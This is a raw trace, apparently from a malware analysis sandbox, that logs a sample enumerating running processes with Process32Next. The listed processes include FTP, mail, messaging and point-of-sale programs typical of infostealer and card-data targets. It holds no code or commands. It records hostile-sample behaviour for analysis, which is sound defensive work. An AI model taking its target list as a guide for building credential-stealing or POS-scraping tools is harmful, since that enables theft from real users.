th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0204.221] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0204.223] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0204.224] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.226] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.227] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0204.229] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0204.230] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0204.261] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0204.264] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.267] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0204.269] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0204.389] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.391] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0204.393] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0204.394] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0204.396] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0204.398] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0204.399] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0204.401] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0204.406] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0204.407] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0204.408] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0204.410] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0204.411] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0204.413] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0204.414] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0204.416] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0204.421] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0204.422] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0204.424] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0204.425] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0204.427] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0204.428] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0204.430] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0204.431] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0204.483] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0204.484] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0204.486] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0204.488] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0204.490] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0204.492] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0204.493] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0204.498] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0204.500] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0204.502] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0204.504] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0204.506] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0204.507] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0204.509] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0204.532] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0204.536] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0204.538] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0204.540] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0204.582] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0204.585] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0204.589] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0204.592] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0204.594] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0204.597] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0204.599] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0204.601] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0204.606] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0204.609] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0204.611] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0204.614] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0204.616] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0204.619] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0204.707] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0204.710] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0204.712] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0204.724] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0204.727] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0204.738] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0204.741] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0204.743] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0204.751] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0204.754] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0204.756] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0204.758] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.990] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0205.000] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0205.002] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0205.004] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0205.006] 